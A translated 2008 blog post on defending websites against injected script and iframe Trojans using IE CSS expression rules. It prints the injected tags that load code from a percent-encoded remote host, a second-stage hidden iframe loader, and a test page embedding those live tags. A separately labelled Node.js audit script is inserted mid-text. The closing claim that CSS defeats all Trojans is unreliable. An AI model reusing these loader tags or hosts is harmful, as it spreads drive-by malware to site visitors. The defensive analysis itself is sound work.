Tips for solving all web Trojans

Source: Internet
Author: User

2008-03-29 00:40:32 Source: Blue Ideal Vickeychen

It is the "hanging horse" (injected web Trojan) problem again. Lately I have gradually been feeling the pressure and my head is spinning: more and more people are adding me through QQ or MSN, and my own work has been very busy recently. Still, thinking it over, I make time to help everyone.

Not long ago, "One line of code to solve IFRAME Trojan injection (including server-side injection, client-side ARP injection, etc.)" was well received by many friends; it is indeed a good way to take shelter from the storm. But the way web Trojans are injected has changed, just as I expected: injected <script> Trojans are now popular. I have seen several users' websites hit this way, with the following added at the top or bottom of the page:

Note: the following address hosts a Trojan; do not visit it casually:

<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>

Unbelievable: n identical <script> tags inserted in a row. My computer has every patch installed, so I accessed http://%76%63%63%64%2E%63%6E directly (or you can download it with Thunder), and this is what the screen showed:

document.write("<div style='display:none'>")
document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>")
document.write("</div>")

I then used Thunder to download the file http://a.158dm.com/b1.htm and took a look: messy JS code, but in it I found something that looked like a QQ number. I added it to have a look, and it turned out to be an organization that professionally supplies web Trojans. What a world. Their prices are very high, too!

...
var kfqq, qqs = "784378237"; Qwfgsg = "LLLL\\XXXXXLD"; kfqq = qqs;
... (followed by n more pieces of statistics JS code)

Faced with this situation, I cannot just stand by and do nothing, so let's think of a way. I drank a bowl of mung bean porridge with quite a lot of sugar in it, very tasty, and a way came to mind. A little analysis gives the answer. Let's see what characterizes the <script> Trojan:

<script src=http://%76%63%63%64%2e%63%6e></script>

Right: a script Trojan generally has an external src, that is, the src begins with http, whereas a site's own scripts generally do not include http. Then look at what the Trojan actually does: it outputs an IFRAME, JS code or other <object> code. No matter how many there are, we kill them all.
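The same characteristic can be checked from the server side. The following Node.js audit is an added example, not part of the original article: it lists every <script> or <iframe> whose src resolves to a host other than the site's own, including percent-encoded hosts like the one above. SITE_ORIGIN, SAMPLE_PAGE and the example.* hosts are constructed for illustration.

```javascript
// Added example, not from the original article. SITE_ORIGIN and SAMPLE_PAGE are constructed.
const SITE_ORIGIN = "http://www.example.com/";

// Constructed page: the site's own 1.js plus injected tags in the forms seen above.
const SAMPLE_PAGE = `
<script type="text/javascript" src="1.js"></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<SCRIPT SRC="HTTP://%76%63%63%64%2E%63%6E" type="text/javascript"></SCRIPT>
<script src='//cdn.example.net/stats.js'></script>
<div style="display:none"><iframe src=http://a.example.org/b1.htm?id=017 width=0 height=0></iframe></div>
<iframe src="about:blank"></iframe>
`;

// Collect the src of every <script>/<iframe> tag (quoted or unquoted attribute).
function extractSources(html) {
  const re = /<(script|iframe)\b[^>]*?\ssrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const out = [];
  for (const m of html.matchAll(re)) {
    out.push({ tag: m[1].toLowerCase(), src: (m[2] ?? m[3] ?? m[4]).trim() });
  }
  return out;
}

// Keep only sources that resolve to an http(s) host other than the site's own.
function findForeignSources(html, siteOrigin) {
  const ownHost = new URL(siteOrigin).hostname;
  const findings = [];
  for (const { tag, src } of extractSources(html)) {
    let url;
    try {
      url = new URL(src, siteOrigin); // resolves relative and //host forms, decodes %xx in the host
    } catch (e) {
      findings.push({ tag, src, host: null }); // unparseable src: report for manual review
      continue;
    }
    if (!/^https?:$/.test(url.protocol)) continue; // about:, res:, data: name no remote host
    if (url.hostname !== ownHost) findings.push({ tag, src, host: url.hostname });
  }
  return findings;
}

for (const f of findForeignSources(SAMPLE_PAGE, SITE_ORIGIN)) {
  console.log(`${f.tag}\t${f.host}\t${f.src}`);
}
```

Legitimate third-party scripts are reported as well, so the output is a list to compare against the hosts the site is known to use.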

Write the CSS along with me. I wrote 5 different solutions, one by one; let's test them:

Solution 1:

iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');} /* This line of code solves the injected iframe Trojan */
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('Trojan is successfully quarantined!'):'');}

Principle: take the src of each <script> tag, convert it to lowercase, and check whether it begins with "http", that is, whether it is an external JS file. If it is, the page content is cleared and "Trojan is successfully quarantined!" is written; otherwise the page displays normally.

Drawback: visitors will not be able to see pages that have been infected with the <script> Trojan.

Solution 2:

iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}

Principle: document.close() forcibly closes the document.write() of the external JS file. At that point the Trojan content has not finished being written; only part of it is flushed to the output, and the rest is never written.

Solution 3:

iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');}
script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');}

Principle: as before, when an external JS file is encountered, IE's proprietary execCommand method is called immediately to stop all page requests, so the external JS file that follows is also forced to stop downloading. It is just like clicking the "Stop" button in the browser; in effect, this is JS simulating IE's Stop button.

Solution 4:

iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');}
script{noj4s:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');}

Principle: the src of the external JS file is rewritten to the address of IE's 404 error page, so the external JS code is never downloaded.

Solution 5:

iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');}
script{noj5s:expression((this.id.toLowerCase().indexOf('lh')!=0)?document.write('Trojan is successfully quarantined!'):'');} /* a script whose id does not begin with "lh" is treated as external */

The fifth solution requires every <script> in the page's own HTML source to carry an id with the "lh" prefix, such as lhweatherjsapi: <script src="***/**.js" id="lhsearchjsapi"></script>

The page code below contains a Trojan address, and the Trojan is repeated 6 times in the page. Try the different solutions above on it and see how my research holds up! (This test carries some risk; make sure all patches are installed before testing.)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>CSS code to make the JS Trojan process abort quickly</title>
<style type="text/css">
/*<![CDATA[*/
iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}
script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');}
/* For the latest Trojan handling methods, see: http://www.nihaoku.cn/ff/api.htm */
/*]]>*/
</style>
</head>
<body>
<script type="text/javascript" src="1.js"></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src="http://%76%63%63%64%2E%63%6E" type="text/javascript"></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
I am the page's own content 1
<script src=http://%76%63%63%64%2e%63%6e></script>
I am the page's own content 2
<script src=http://%76%63%63%64%2e%63%6e></script>
I am the page's own content 3
<script src=http://%76%63%63%64%2e%63%6e></script>
</body>
</html>

Here 1.js is the site's own script:

document.write("I am the JS file on this site");
document.write ("

My test environment is:

Windows XP SP2 and Windows Vista SP1
IE6/IE7/IE8
All patches installed.

To sum up, all the current ways of injecting Trojans are defeated: CSS can solve all of these Trojan problems, and visitors will no longer be infected so easily.

Please also study this carefully and see what bugs my code has. If you find any, bring them up for discussion so we can solve the problem! Or, if you have other, better methods, let's talk about them.
